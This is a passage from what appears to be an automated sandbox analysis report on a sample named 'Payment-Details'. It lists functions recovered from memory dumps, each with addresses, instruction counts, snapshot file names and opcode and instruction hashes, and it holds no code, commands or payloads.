                                        • Opcode Fuzzy Hash: 3aa33588ecc611e462f42b6c37e28c0ca2cb8de35cb9afa752639b5951c3d151
                                        • Instruction Fuzzy Hash: 7F212EB0E0020ACFDB44DFA9C4456AFFBBAFB4A300F1086A9D414A3344D7355981CFA1
                                        Function 019F1083 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0974212b91ce5964ce6e275a786a3c8c7e8ed9fd529f50ffa21344c91f8e6f84
                                        • Instruction ID: b347625770daf58c4389012c6d9ec858b669373193ab13f2db97a412a4cc8ed2
                                        • Opcode Fuzzy Hash: 0974212b91ce5964ce6e275a786a3c8c7e8ed9fd529f50ffa21344c91f8e6f84
                                        • Instruction Fuzzy Hash: B4112731648A84EFC70A6BBC881812C7F62FFD5746708897EC1155B3A1CB35C815D79A
                                        Function 019F4DD8 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7601d1cebf9fad6c777f9e59c772097544a61663d00493f22571c599aecf266
                                        • Instruction ID: 6029ddd8778a6b7f1fb047218fb2b9f233e4d512b2a79cd8fa5fbe1014eb788f
                                        • Opcode Fuzzy Hash: c7601d1cebf9fad6c777f9e59c772097544a61663d00493f22571c599aecf266
                                        • Instruction Fuzzy Hash: 7D31E2B0D01318AFEB20DF9AC588B9EBBF4AB48715F25841AE508AB240C7B55845CFA0
                                        Function 019F5197 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 656c83b03134cd0ad58560955ab90da9e8a64157274890383cf7a29b9e4242e0
                                        • Instruction ID: a83946dd061695a8080cc97615ac44440fd7756cde67376ac125221e798fe44f
                                        • Opcode Fuzzy Hash: 656c83b03134cd0ad58560955ab90da9e8a64157274890383cf7a29b9e4242e0
                                        • Instruction Fuzzy Hash: A9113672B0A2121BEB06DA3C9C941FFBBAAAFD517530A812DE119D7201EE308806C390
                                        Function 07257585 Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 454a5e081c7874eca4c5597c45f3a57f69a23483cd5b99ab346d9ed21370173f
                                        • Instruction ID: 591317e2dd0c0a0689cb28d3be17ac78d0f0b2d5dacba8350ced26da6a73825e
                                        • Opcode Fuzzy Hash: 454a5e081c7874eca4c5597c45f3a57f69a23483cd5b99ab346d9ed21370173f
                                        • Instruction Fuzzy Hash: 56114CF39E46549ECB01DA28EC465E57FF49B0D234B64819BCC1ACB602D734E992CBC1
                                        Function 0725B840 Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 215fda38338dc0287f9f3240444ee5d57b45d89b517d488c75bf513348b18554
                                        • Instruction ID: 86a19db7fb2f49295793b78e5fe7387e32f2e9434872570379b4248e4114eff5
                                        • Opcode Fuzzy Hash: 215fda38338dc0287f9f3240444ee5d57b45d89b517d488c75bf513348b18554
                                        • Instruction Fuzzy Hash: 99217F75B002068FCB04DFA9C89596EBFF6AF85311F1580A5E945DB3A1D730ED01CBA1
                                        Function 019FB900 Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2c1884e9ad22fc3523c33dc322a7a75bcde90b40c3987c65f5088d61e08d755
                                        • Instruction ID: d5097eadd142a3549c2cd5143c7aa6a5d66aab626d9409d257d44d16adbe42f9
                                        • Opcode Fuzzy Hash: c2c1884e9ad22fc3523c33dc322a7a75bcde90b40c3987c65f5088d61e08d755
                                        • Instruction Fuzzy Hash: D5216FB0D05208EFDB40DFA9D449BADBBFAFB49309F648569D60EA3351D7384A80CB10
                                        Function 0725AB10 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d32e428e0cddcd1e4092ac167f24f7e16b23b72808e46d7f62342502dff35d52
                                        • Instruction ID: ad16884f9ffff4529eec228498a31cf90ef2bef51e51d96914ec240042f9ceae
                                        • Opcode Fuzzy Hash: d32e428e0cddcd1e4092ac167f24f7e16b23b72808e46d7f62342502dff35d52
                                        • Instruction Fuzzy Hash: BF1122717102059FDB108F7888127FA7FF6AF89200F14826AE845DB380DBB4C842CBA2
                                        Function 0725BE51 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aed373a300a4d5b42913b117233927ab5cad9843cb1c64e6832a717ee07b13a
                                        • Instruction ID: 5cbf876233caa67ec40e0202163144b10555cdd8def4c50448abe877e8a28599
                                        • Opcode Fuzzy Hash: 0aed373a300a4d5b42913b117233927ab5cad9843cb1c64e6832a717ee07b13a
                                        • Instruction Fuzzy Hash: F81101F1A283C79FCB03877484552A97FF99F43211F4D84DAE949CB182EB788945C3A2
                                        Function 07256B41 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14f6df9ed2a059b97decafdb95e8e17867577095a47d00f6dde666aac29d7883
                                        • Instruction ID: 8f941f0f522e13850b9d4da4934d1f6b3206b00222434197d6147ff3000391f5
                                        • Opcode Fuzzy Hash: 14f6df9ed2a059b97decafdb95e8e17867577095a47d00f6dde666aac29d7883
                                        • Instruction Fuzzy Hash: BF31F6B4D0021ACFDB64DFA8D8997ADBBB2FB49310F5090A9D90AA3354DB345D84CF11
                                        Function 019F5558 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aced726ca4eebbac191695c810ed45048b7fdeb684f2105d30f45326759ad955
                                        • Instruction ID: 4c4880fae60d9ea24d47e41d0567b47eef1bcb883c8c5abca335b1ab5eaffe07
                                        • Opcode Fuzzy Hash: aced726ca4eebbac191695c810ed45048b7fdeb684f2105d30f45326759ad955
                                        • Instruction Fuzzy Hash: 3B21DF71A0430A8FD710DB68D4449AFBBF6FFC0214F10846ED61AEB325DB70A809CB91
                                        Function 07256C25 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a6d3f9b9c53b9e1769f543d6736583aa660e458148d7d3fa88e9b7ae8ddf0d
                                        • Instruction ID: 62b422120e577f5753af8dcf1ec61fa5716f7185522241561a4ee19ca6ba554d
                                        • Opcode Fuzzy Hash: 34a6d3f9b9c53b9e1769f543d6736583aa660e458148d7d3fa88e9b7ae8ddf0d
                                        • Instruction Fuzzy Hash: 6B21D2B490121ACFDB64DF68D8857ADBBB2FB49310F5091AAD94AA3350DB349D80CF10
                                        Function 066F1F75 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e6f74a94908d59b2e4dd8d490e8bfa4cb479b172db280f752de6ff21515d49e
                                        • Instruction ID: 589e8bce97a320e852c64e14074cbddfc3b8d09e8dff785a7ebb703513e43e40
                                        • Opcode Fuzzy Hash: 8e6f74a94908d59b2e4dd8d490e8bfa4cb479b172db280f752de6ff21515d49e
                                        • Instruction Fuzzy Hash: E321CC71911269CFEBA0CF54C880BE9B7FABB49300F1081E6EA09A7241D7309A95CF40
                                        Function 019F0868 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8f3887262eda27dd9ab430bbf38b6ad4d6a2048bc16fedea2b5deaf551c32ed
                                        • Instruction ID: 713035028b8a0c32db97ac0d08152e67d730c087c50fb27431aac625feccb5c2
                                        • Opcode Fuzzy Hash: d8f3887262eda27dd9ab430bbf38b6ad4d6a2048bc16fedea2b5deaf551c32ed
                                        • Instruction Fuzzy Hash: AC113470E042069FCB01CFA8C589A6EBBB5FF49300F19849AE659DB262D234D841CB81
                                        Function 019FFB38 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f9a5af62863e4559fc96d5e51a07e7580df8a6d2bb146498564f26b0e1ef1cc
                                        • Instruction ID: 7794a3af4ac49d03701a1f5193421c5952088f545addb3462cbef87e6867b92c
                                        • Opcode Fuzzy Hash: 5f9a5af62863e4559fc96d5e51a07e7580df8a6d2bb146498564f26b0e1ef1cc
                                        • Instruction Fuzzy Hash: C011F6B2D0421DDFDB04CFA9D854AEEBBB6EB88312F10842AD619B2250D7745945CB94
                                        Function 019F0857 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 887057acd8f10e6ff7129d717ce1863a59230b2ff4de8574b09dec875da754f8
                                        • Instruction ID: f0f7c7e70f2a0f889ace1656d50ba2e5cc8bf123e9cd09e70bd6b2500740021f
                                        • Opcode Fuzzy Hash: 887057acd8f10e6ff7129d717ce1863a59230b2ff4de8574b09dec875da754f8
                                        • Instruction Fuzzy Hash: 0D113470E00209DFCB54DFA8C585AAEBBF5FF48310F5981A8E649DB262D331D841CB82
                                        Function 0725A889 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a602d479f7066177e0d8f6845688195644609a988d213d733a5f4fe70529c9c8
                                        • Instruction ID: be42a3d0353f078e9e1f795f49192ef6fbbf486b2273502a4811e6260777fc2b
                                        • Opcode Fuzzy Hash: a602d479f7066177e0d8f6845688195644609a988d213d733a5f4fe70529c9c8
                                        • Instruction Fuzzy Hash: 5A2162B8A12219EFDB04CFA8D595EADBBF2BF49700F114159E906AB361CB34AD41CB50
                                        Function 019F51E8 Relevance: .1, Instructions: 54COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d6545961acfee66f57028913b54bf6b13c3286f8fb70b9c6b4aa772ef481b88
                                        • Instruction ID: 3822839330417105823f8ff5743a9091143e4efc1c0f7135cc64f401abb52c86
                                        • Opcode Fuzzy Hash: 6d6545961acfee66f57028913b54bf6b13c3286f8fb70b9c6b4aa772ef481b88
                                        • Instruction Fuzzy Hash: 6701D472B087166BAB169B7D98404BFBAFFEFC9261306852DE61CD7345EE309C018790
                                        Function 0725B7C0 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b55c3e43246cf8712557985121c0f96462d31e98dd8a2b814b7e22350ddb919
                                        • Instruction ID: 7e4d72de0aef32b608338e5ffef810e0198a62390ba598f37ce5a77fd8ccf99b
                                        • Opcode Fuzzy Hash: 3b55c3e43246cf8712557985121c0f96462d31e98dd8a2b814b7e22350ddb919
                                        • Instruction Fuzzy Hash: 760128F361825A5FD754CAECE404BEABFF8EB41220F1480ABF884D7250D631D990C790
                                        Function 070E2F70 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b44a5ebd7df5867ff2f4c2f40b193cbf96fbfb1cd63869915f3bfd5baf2aae1
                                        • Instruction ID: a1b08bfae7f71fc90ff74a2f06c5203c6d987d9f0a16b254e6fb8aaa3c205967
                                        • Opcode Fuzzy Hash: 4b44a5ebd7df5867ff2f4c2f40b193cbf96fbfb1cd63869915f3bfd5baf2aae1
                                        • Instruction Fuzzy Hash: 350192B4909248EFCB60DFA5D85479EBBFCEF45301F2086EAD84893250DA314B41C792
                                        Function 0725A768 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1355cedd81526579091700dfec76f173bca5f22e8c6af6943d80d181dc2e353
                                        • Instruction ID: a93bcfbc1cb7ef35d79cd72bc5b33eab561b6b0a44d1cdf86cba3f82f2390a46
                                        • Opcode Fuzzy Hash: a1355cedd81526579091700dfec76f173bca5f22e8c6af6943d80d181dc2e353
                                        • Instruction Fuzzy Hash: 53018476340215AFDB008E59DC85F9E7BFDEB88721F108066FA05CB290C6B1D9008B60
                                        Function 070EECB9 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89fedca6052410d1166948c132c175cbcd8d75465a751233cdf8c1bcee0d1a96
                                        • Instruction ID: 97f4682319bf406e6ce0f80bd01d5adc9d42c584051ae61a82e87fcf8af8c411
                                        • Opcode Fuzzy Hash: 89fedca6052410d1166948c132c175cbcd8d75465a751233cdf8c1bcee0d1a96
                                        • Instruction Fuzzy Hash: 230120B270A5569FFB21465CEC40699FFBCFF82250F18036BD545C3101D2219857C791
                                        Function 07233998 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02a261626fcc161f3e53d9cbff998a12f75d96da0d3d7c6f994c9a6fbc9dc79e
                                        • Instruction ID: d6868462c1c3310a2c5dc100e709461ca76027f9fd0cfc7f5c1e84b82440bd4b
                                        • Opcode Fuzzy Hash: 02a261626fcc161f3e53d9cbff998a12f75d96da0d3d7c6f994c9a6fbc9dc79e
                                        • Instruction Fuzzy Hash: D71121B0300380DFC7259734C410A3B7BA2AF8A220F148669D0924B292DB35EC02CB80
                                        Function 07235858 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b81dd9de03435337e8d04bbc6a6b739bd82c92a417f6dd941c7650d259b79da7
                                        • Instruction ID: e5b8a3ddcdd3328405235ee2bc3b8de0d20c09d9510862d117c2ddea549d4163
                                        • Opcode Fuzzy Hash: b81dd9de03435337e8d04bbc6a6b739bd82c92a417f6dd941c7650d259b79da7
                                        • Instruction Fuzzy Hash: 07010471B001059FCB04EB65D884BDABBF6EF89310F2041A9D14C97351CB35AC95CB41
                                        Function 019F0FD1 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48b72816310e0e42d2b5473e50569aef1447f7c82bdcd2e72a5880c079fe29b1
                                        • Instruction ID: bbf940625a43f04262877ad7cec0cb4c14dde3566ae4a27b9dc74361d1ab8db4
                                        • Opcode Fuzzy Hash: 48b72816310e0e42d2b5473e50569aef1447f7c82bdcd2e72a5880c079fe29b1
                                        • Instruction Fuzzy Hash: 110171317046109FCB0A9BB89418A6E7BB7EBCA61571184BED50ACB350DF368806CF56
                                        Function 070EBC13 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be58f22f42624bae5069efb289b46c37b5fd24a6e03abd6d6dd3083dbfa7325e
                                        • Instruction ID: c456066104a5fa92685006b7cd5b3636dbf2710e3b4f22fca955ca9fde753dc5
                                        • Opcode Fuzzy Hash: be58f22f42624bae5069efb289b46c37b5fd24a6e03abd6d6dd3083dbfa7325e
                                        • Instruction Fuzzy Hash: AE0169B1D0420DEFCB50DFA8E8446EDBBF8EF09200F1046AAD418E3250D7305A95CB91
                                        Function 019F4E20 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cf0663f53030667b44a037921d2a27d00f6d7a2a12a45be3207b2dc9d2f2baa
                                        • Instruction ID: ff4077a5e66b5ef85c59982a1faf4bd70e25419d764c7e11561b02ac0a2671b2
                                        • Opcode Fuzzy Hash: 4cf0663f53030667b44a037921d2a27d00f6d7a2a12a45be3207b2dc9d2f2baa
                                        • Instruction Fuzzy Hash: 511106B5D003499FDB20DF9AC549B9EFBF8EB48320F118419DA59A7340D374A944CFA5
                                        Function 019F5060 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e90631ab360973b4684307f03296c9c63774256116a8907248da78af9fe38b51
                                        • Instruction ID: 08e896360103783527bd3923a60566f93527ef6a89021b7c7a79667fec73b5f2
                                        • Opcode Fuzzy Hash: e90631ab360973b4684307f03296c9c63774256116a8907248da78af9fe38b51
                                        • Instruction Fuzzy Hash: 1E1106B5D003499FDB20DF9AC549B9EFBF4EB48320F118419DA59A7340D374A944CFA5
                                        Function 019F5C50 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b53b03e6848d05a5444e36985a68f497cd851e6e712bc17977fe93f7c2319ab0
                                        • Instruction ID: bda0f5ec6a40441247e4dedf64ef1b596edb7596817e1b1ef3f4f9f55cc3d2e6
                                        • Opcode Fuzzy Hash: b53b03e6848d05a5444e36985a68f497cd851e6e712bc17977fe93f7c2319ab0
                                        • Instruction Fuzzy Hash: 341110B5C003499FDB20DFAAC849BCAFBF8AB48720F10841AD559A7600C374A544CFA5
                                        Function 072314A0 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9870d876560ee10701b842bea2e106cf4073e772028fb3189150cf5d9835ecaa
                                        • Instruction ID: 29b343422e52e660dd2eb895d29fc0e3b3c2849e07224c8f21c26aa2b369fce9
                                        • Opcode Fuzzy Hash: 9870d876560ee10701b842bea2e106cf4073e772028fb3189150cf5d9835ecaa
                                        • Instruction Fuzzy Hash: 3D01B135300611DFC7069B64D024D5ABBF6EF8A711714826AE60687791DB39EC12CB95
                                        Function 07252CED Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a04b8b0e856fc2d721104054c4603e13093661e57e6f095c89f9cf5364522b64
                                        • Instruction ID: 66c57f766d709a77608e6880c6822fc056319a322b37577130312a7e584caf6b
                                        • Opcode Fuzzy Hash: a04b8b0e856fc2d721104054c4603e13093661e57e6f095c89f9cf5364522b64
                                        • Instruction Fuzzy Hash: 50218074A01629CFDB64DF24DC58B9ABBB1FB49302F0051EAD90EA7290EB705E80CF51
                                        Function 019F0FE0 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9925db6dd63f068630eae5585d0d01af6b91e264fe5ef2306124eca4d975cf3a
                                        • Instruction ID: 10cc47baeffe3c2505cb0a2aac2e9a46063784cf1b78c5f56181dd39eca74993
                                        • Opcode Fuzzy Hash: 9925db6dd63f068630eae5585d0d01af6b91e264fe5ef2306124eca4d975cf3a
                                        • Instruction Fuzzy Hash: 100181317042109FCB0DABB9981896E7BBBEBCA615701447DD50ACB390DF369801CF96
                                        Function 072339A8 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50bb87bd760b93eb1d1fc6c0500e23783d6353ceae570d787652528017f7dbee
                                        • Instruction ID: eec39d0d831fe4f704e2a23d7ac12f2ef54f731bcbc135ba3dfd9dc451c0261e
                                        • Opcode Fuzzy Hash: 50bb87bd760b93eb1d1fc6c0500e23783d6353ceae570d787652528017f7dbee
                                        • Instruction Fuzzy Hash: B0019AF1710704DFD724DB38D454A3B7BA2ABC9320F148A28E5624B791CB75EC42CB90
                                        Function 070EC100 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21122db352887382440bc1470e275b1f97d048165c8a68696df2fe1d22333f88
                                        • Instruction ID: a00eeddd98fbef0c7eab7cb8a107f61b967dbad3c53beebc18f5418508fbc040
                                        • Opcode Fuzzy Hash: 21122db352887382440bc1470e275b1f97d048165c8a68696df2fe1d22333f88
                                        • Instruction Fuzzy Hash: 31111BB0E04349DFDB54DFA988402AEBBFAEB4A300F1485AAD458E2351E7344981CBA1
                                        Function 07233EF2 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
